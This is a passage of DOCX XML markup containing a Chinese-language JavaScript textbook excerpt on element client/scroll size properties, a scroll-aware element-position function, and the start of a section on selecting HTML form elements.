          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251686912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2592237" cy="646981"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="28" name="00028.jpeg" descr="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00028.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2592237" cy="646981"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了理解这些</w:t>
      </w:r>
      <w:r>
        <w:t>client</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>scroll</w:t>
      </w:r>
      <w:r>
        <w:t>属性，你需要知道</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的实际内容有可能比分配用来容纳内容的盒子更大，因此单个元素可能有滚动条（见</w:t>
      </w:r>
      <w:r>
        <w:t>16.2.6</w:t>
      </w:r>
      <w:r>
        <w:t>节中</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>overflow</w:t>
      </w:r>
      <w:r>
        <w:t>属性）。内容区域是视口，就像浏览器的窗口，当实际内容比视口更大时，需要把元素的滚动条位置考虑进去。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>clientWidth</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clientHeight</w:t>
      </w:r>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>offsetWidth</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>offsetHeight</w:t>
      </w:r>
      <w:r>
        <w:t>，不同的是它们不包含边框大小，只包含内容和它的内边距。同时，如果浏览器在内边距和边框之间添加了滚动条，</w:t>
      </w:r>
      <w:r>
        <w:t>clientWidth</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clientHeight</w:t>
      </w:r>
      <w:r>
        <w:t>在其返回值中也不包含</w:t>
      </w:r>
      <w:r>
        <w:t>滚动条。注意，对于类似＜</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞这些内联元素，</w:t>
      </w:r>
      <w:r>
        <w:t>clientWidth</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clientHeight</w:t>
      </w:r>
      <w:r>
        <w:t>总是返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在例</w:t>
      </w:r>
      <w:r>
        <w:t>15-9</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>getViewportSize()</w:t>
      </w:r>
      <w:r>
        <w:t>方法中使用了</w:t>
      </w:r>
      <w:r>
        <w:t>clientWidth</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clientHeight</w:t>
      </w:r>
      <w:r>
        <w:t>。有一个特殊的案例，在文档的根元素上查询这些属性时，它们的返回值和窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>innerWidth</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>innerHeight</w:t>
      </w:r>
      <w:r>
        <w:t>属性值相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>clientLeft</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clientTop</w:t>
      </w:r>
      <w:r>
        <w:t>属性没什么用：它们返回元素的内边距的外边缘和它的边框的外边缘之间的水平距离和垂直距离，通常这些值就等于</w:t>
      </w:r>
      <w:r>
        <w:t>左边和上边的边框宽度。但是如果元素有滚动条，并且浏览器将这些滚动条放置在左侧或顶部（可这不太常见），</w:t>
      </w:r>
      <w:r>
        <w:t>clientLeft</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clientTop</w:t>
      </w:r>
      <w:r>
        <w:t>也就包含了滚动条的宽度。对于内联元素，</w:t>
      </w:r>
      <w:r>
        <w:t>clientLeft</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clientTop</w:t>
      </w:r>
      <w:r>
        <w:t>总是为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>scrollWidth</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>scrollHeight</w:t>
      </w:r>
      <w:r>
        <w:t>是元素的内容区域加上它的内边距再加上任何溢出内容的尺寸。当内容正好和内容区域匹配而没有溢出时，这些属性与</w:t>
      </w:r>
      <w:r>
        <w:t>clientWidth</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clientHeight</w:t>
      </w:r>
      <w:r>
        <w:t>是相等的。但当</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>溢出时，它们就包含溢出的内容，返回值比</w:t>
      </w:r>
      <w:r>
        <w:t>clientWidth</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>cli</w:t>
      </w:r>
      <w:r>
        <w:t>entHeight</w:t>
      </w:r>
      <w:r>
        <w:t>要大。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，</w:t>
      </w:r>
      <w:r>
        <w:t>scrollLeft</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>scrollTop</w:t>
      </w:r>
      <w:r>
        <w:t>指定元素的滚动条的位置。在</w:t>
      </w:r>
      <w:r>
        <w:t>getScrollOffsets()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（例</w:t>
      </w:r>
      <w:r>
        <w:t>15-8</w:t>
      </w:r>
      <w:r>
        <w:t>）中在文档的根元素上我们查询过它们。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>scrollLeft</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>scrollTop</w:t>
      </w:r>
      <w:r>
        <w:t>是可写的属性，通过设置它们来让元素中的内容滚动。（</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素并没有类似</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>scrollTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当文档包含可滚动的且有溢出内容的元素时，上述定义的</w:t>
      </w:r>
      <w:r>
        <w:t>getElementPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>方法就不能正常工作了，因为它没有把滚动条考虑进去。这里有一个修改版，它</w:t>
      </w:r>
      <w:r>
        <w:t>从累计的偏移量中减去了滚动条的位置，这样一来，将返回的位置从文档坐标转换为视口坐标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getElementPos(elt){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=0,y=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>循环以累加偏移量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var e=elt;e!=null;e=e.offsetParent){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x+=e.offsetLeft;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y+=e.offsetTop;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>再次循环所有的祖先元素，减去滚动的偏移量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这也减去了主滚动条，并转换为视口坐标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for(var </w:t>
      </w:r>
      <w:r>
        <w:t>e=elt.parentNode;e!=null</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>e.nodeType==1;e=e.parentNode){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x-=e.scrollLeft;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y-=e.scrollTop;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{x:x,y:y};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在现代浏览器中，</w:t>
      </w:r>
      <w:r>
        <w:t>getElementPos()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的返回值和</w:t>
      </w:r>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值一样（但是更低效）。理论上，如</w:t>
      </w:r>
      <w:r>
        <w:t>getElementPos()</w:t>
      </w:r>
      <w:r>
        <w:t>这样的函数可以在不支持</w:t>
      </w:r>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器中使用。但实际上，不支持</w:t>
      </w:r>
      <w:r>
        <w:t>getBoun</w:t>
      </w:r>
      <w:r>
        <w:t>dingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器在元素位置方面有很多的不兼容性，像这样如此简陋的函数无法可靠地工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实际类似</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>这样的客户端类库包含了一些函数来计算元素的位置，它们扩充了这个基本的位置计算算法，修复了一系列浏览器特定的</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>。如果需要代码在所有不支持</w:t>
      </w:r>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器中正确计算元素的位置，你很可能需要像</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>这样的类库。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="385" w:name="15_9_HTMLBiao_Dan_"/>
      <w:r>
        <w:t>15.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单</w:t>
      </w:r>
      <w:bookmarkEnd w:id="385"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素和各种各样的表单输入元素（如＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>）在客户端编程中有着重要的地位。这些</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素可以追溯到</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>的最开始，比</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>本身更早。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单就是第一代</w:t>
      </w:r>
      <w:r>
        <w:t>We b</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序背后的运作机制，它根本就不需要</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>。用户的输入从表单元素来收集；表单将这些输入递</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>交给服务器；服务器处理输入并生成一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>页面（通常有一个新的表单元素）显示在客户端。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>即使当整个表单数据都是由客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>来处理并不会提交到服务器时，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单元素仍然是收集用户数据很好的方法。在服务端程序中，表单必须要有一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>提交</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，否则它就</w:t>
      </w:r>
      <w:r>
        <w:t>没有用处。另一方面，在客户端编程中，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>提交</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮不是必须的（虽然它可能仍然有用）。服务端程序是基于表单提交动作的</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>它们按表单大小的块处理数据</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>这限制了它们的交互性。客户端程序是基于事件的</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>它们可以对单独的表单元素上的事件做出响应</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>这使得它们有更好的响应度。例如，在用户打字时客户端程序就能校验输入的有效性。或者通过单击一个复选框来启用一组选项，也就是说当复选框被选中时那组选项才有意义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以下小节阐述了用</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单如何做到这些事情。表单由</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素组成，就像</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档的其他部分一样，并且可以用本章</w:t>
      </w:r>
      <w:r>
        <w:t>中介绍过的</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>技术来操作它们。但是表单是第一批脚本化的元素，在最早的客户端编程中它们还支持比</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>更早的一些其他的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>请注意，本节是关于脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>本身。假设你已经对用于定义表单的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素（＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>＞等）有一定的了解。尽管如此，表</w:t>
      </w:r>
      <w:r>
        <w:t>15-1</w:t>
      </w:r>
      <w:r>
        <w:t>列出了最常使用</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的表单元素。更详细的内容请参考第四部分中的表单和表单元素</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，在</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>TextArea</w:t>
      </w:r>
      <w:r>
        <w:t>下面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4097547" cy="1043796"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="29" name="00029.jpeg" descr="000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00029.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4097547" cy="1043796"/>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688960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4188124" cy="4343400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="30" name="00030.jpeg" descr="000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00030.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4188124" cy="4343400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="386" w:name="15_9_1_Xuan_Qu_Biao_Dan_He_Biao_Dan_Yuan"/>
      <w:r>
        <w:t>15.9.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　选取表单和表单元</w:t>
      </w:r>
      <w:r>
        <w:t>素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="386"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表单和它们所包含的元素可以用如</w:t>
      </w:r>
      <w:r>
        <w:t>getElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>等标准的方法从文档中来选取：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var fields=document.getElementById("address").getElementsByTagName("input");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在支持</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器中，从一个表单中选取所有的单选按钮或所有同名的元素的代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//id</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"shipping"</w:t>
      </w:r>
      <w:r>
        <w:t>的表单中所有的单选按钮</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.querySelecto</w:t>
      </w:r>
      <w:r>
        <w:t>rAll('#shipping input[type="radio"]');//id</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"shipping"</w:t>
      </w:r>
      <w:r>
        <w:t>的表单中所有名字为</w:t>
      </w:r>
      <w:r>
        <w:t>"method"</w:t>
      </w:r>
      <w:r>
        <w:t>的单选按钮</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.querySelectorAll('#shipping input[type="radio"][name="method"]');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管如此，如同在</w:t>
      </w:r>
      <w:r>
        <w:t>14.7</w:t>
      </w:r>
      <w:r>
        <w:t>节、</w:t>
      </w:r>
      <w:r>
        <w:t>15.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
